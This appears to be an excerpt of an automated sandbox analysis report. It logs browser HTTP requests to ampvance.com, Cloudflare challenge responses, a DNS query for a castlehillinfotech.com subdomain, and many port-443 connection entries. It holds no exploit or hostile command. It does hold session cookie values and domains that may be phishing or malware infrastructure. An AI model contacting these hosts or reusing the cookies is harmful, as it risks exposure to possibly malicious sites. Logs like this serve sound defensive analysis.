          Source: global trafficHTTP traffic detected: GET /boot/048a11303f2c0b13c71de5123e30fffb65e71cdee6db2 HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
          Source: global trafficHTTP traffic detected: GET /js/048a11303f2c0b13c71de5123e30fffb65e71cdee6db3 HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1Host: ampvance.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
          Source: global trafficHTTP traffic detected: GET /APP-048a11303f2c0b13c71de5123e30fffb65e71ce053bdc/048a11303f2c0b13c71de5123e30fffb65e71ce053bde HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
          Source: global trafficHTTP traffic detected: GET /o/048a11303f2c0b13c71de5123e30fffb65e71ce053c02 HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/m_.svg HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/sig-op.svg HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
          Source: global trafficHTTP traffic detected: GET /x/048a11303f2c0b13c71de5123e30fffb65e71ce053be3 HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/sig-op.svg HTTP/1.1Host: ampvance.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
          Source: global trafficHTTP traffic detected: GET /x/048a11303f2c0b13c71de5123e30fffb65e71ce053be3 HTTP/1.1Host: ampvance.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
          Source: global trafficHTTP traffic detected: GET /o/048a11303f2c0b13c71de5123e30fffb65e71ce053c02 HTTP/1.1Host: ampvance.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
          Source: global trafficHTTP traffic detected: GET /ASSETS/img/m_.svg HTTP/1.1Host: ampvance.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
          Source: unknownDNS traffic detected: queries for: rfpcertstream.castlehillinfotech.com
          Source: unknownHTTP traffic detected: POST /report/v3?s=2mf8xaZkZKjsOfK2ulW9AE0aKQkzRdwMK5ldITE2N8XTB%2B8k6mGqsrrXokklGBcNnJuj7OvyIwrXYnnE1bym%2BknWxe8bCFnop4KTmyGoeor7PN6XWVfJac2XwwSOapY%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 429Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Mar 2024 13:23:13 GMTServer: ApacheContent-Length: 283Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Mar 2024 13:23:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16113Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengecf-chl-out: lgcyJ+mAKWDwMhDhG49DFK9slm754FLc9x77MV8wu8jF8ZXyTl8/mcppkR2WvbiFdeSGwK7lknpMPQV7B1yam7TsNR8HX3TY0oWnFON3AJ6u2ltCQVNDUu4q18IgMuot2ruPT4wEhFhCrq3FGTnYwQ==$1M79hhShicXO2BG2nrjEqA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMT
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Mar 2024 13:23:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16226Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengecf-chl-out: /orLynNxT+AvVJSe8SqspTD77BJQ0iddxfOb02BXud27TapXpkkbrq6JeOTvyOKauSj2ND8z32+P/oJ96JU2R4A+8TfYA4sH3lLI/zqrHmfTMIuK/H3+WQcegnOJEA+zDiID3RtomCWL+xyQ5C5INA==$rgF9YV4Q0b47gy/C9DKn4w==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMT
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Mar 2024 13:23:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16226Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengecf-chl-out: nDftIq7ge14hRdVJtmRWC+HUEQb0w7NJSgg/ISCmhFcH8RiWehGUoGESbYQ1hyPUn0Mxh3AKHzTop4EM17t2lYnZsfq08ftOJU9HoQgpPElLUyCvqUI0/+0Wuin85vAV03JlDDd9fIbnB+G+pMvMXg==$Rk+1+AAEQTbFuKjwt3IrFA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMT
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 05 Mar 2024 13:23:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 16332Connection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengecf-chl-out: WeF7rs8fW6yTIlp9fgSxTJBEysyZS2qAGWw6Z2psM2dAi+UXzkN1fj0IiXZwP9Kt3zbFT7oL19cIlsCnHsYZIkEtB/9UJC+SA1R2UN7yPDmaKMXEu82UpA0m1uJu1yJzl8TC9qO3jkUsWJ2wqPfeVw==$Hlpd40wfFtUpq4G1EFulZQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMT
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Mar 2024 13:23:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XcF14UCAAyTf%2FjfNnuotUBkWSG%2B0hS%2B0aHxRgF3uo2MTLKPyJM236qXjr41SGJ%2BdJWwkmy0%2FKOU8aGEu7DEa6e%2FG%2B%2FRiHTRBQWbvIN0fVGiU12W1Qr54c8scRfUgr04%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 85fa6c197e3f0f7f-EWRalt-svc: h3=":443"; ma=86400
          Source: chromecache_52.2.drString found in binary or memory: https://getbootstrap.com/)
          Source: chromecache_52.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
          Source: chromecache_52.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
